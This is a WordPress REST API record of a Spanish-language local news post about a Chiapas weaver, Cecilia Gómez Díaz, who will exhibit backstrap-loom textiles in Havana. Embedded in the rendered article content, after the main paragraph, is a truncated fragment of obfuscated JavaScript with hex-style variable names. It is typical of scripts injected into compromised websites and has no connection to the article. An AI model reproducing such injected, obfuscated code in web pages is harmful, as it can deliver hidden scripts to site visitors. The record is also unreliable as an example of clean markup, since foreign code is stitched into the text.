{"id":14395,"date":"2024-02-28T00:15:50","date_gmt":"2024-02-28T00:15:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14395"},"modified":"2024-02-28T00:15:50","modified_gmt":"2024-02-28T00:15:50","slug":"artesana-de-san-andres-larrainzar-participara-la-habana-cuba","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14395","title":{"rendered":"Artesana de San Andr\u00e9s Larrainzar participar\u00e1 La Habana, Cuba"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"982\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240227-WA0006-982x1024.jpg\" alt=\"\" class=\"wp-image-14397\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240227-WA0006-982x1024.jpg 982w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240227-WA0006-288x300.jpg 288w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240227-WA0006-768x801.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240227-WA0006.jpg 1036w\" sizes=\"auto, (max-width: 982px) 100vw, 982px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>27 de Febrero del 2024. San Crist\u00f3bal de Las Casas.- Cecilia G\u00f3mez D\u00edaz, artesana de San Andr\u00e9s Larr\u00e1inzar, Chiapas, es una de las destacadas artistas que participar\u00e1 en la exposici\u00f3n colectiva &#8220;Contrastes de Chiapas en Cuba&#8221;, que tendr\u00e1 lugar el 28 de marzo en la Casa del Benem\u00e9rito de las Am\u00e9ricas en La Habana, Cuba. En un escrito, dieron a conocer, que este proyecto, auspiciado por Portales del Arte y el National Museum Of Mexican Art, celebra la riqueza cultural y art\u00edstica de Chiapas. Cecilia llevar\u00e1 su habilidad en el tejido en telar de cintura, destacando el uso de tintes naturales y la tem\u00e1tica de equidad de g\u00e9nero y cuidado de la naturaleza en sus obras.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 27 de Febrero del 2024. San Crist\u00f3bal de Las Casas.- Cecilia G\u00f3mez D\u00edaz, artesana de San Andr\u00e9s Larr\u00e1inzar, Chiapas, es una de las destacadas artistas que participar\u00e1 en la exposici\u00f3n colectiva &#8220;Contrastes de Chiapas en Cuba&#8221;, que tendr\u00e1 lugar el 28 de marzo en la Casa del Benem\u00e9rito de las Am\u00e9ricas en La &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14397,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-14395","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14395","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14395"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14395\/revisions"}],"predecessor-version":[{"id":14398,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14395\/revisions\/14398"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14397"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14395"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14395"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14395"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}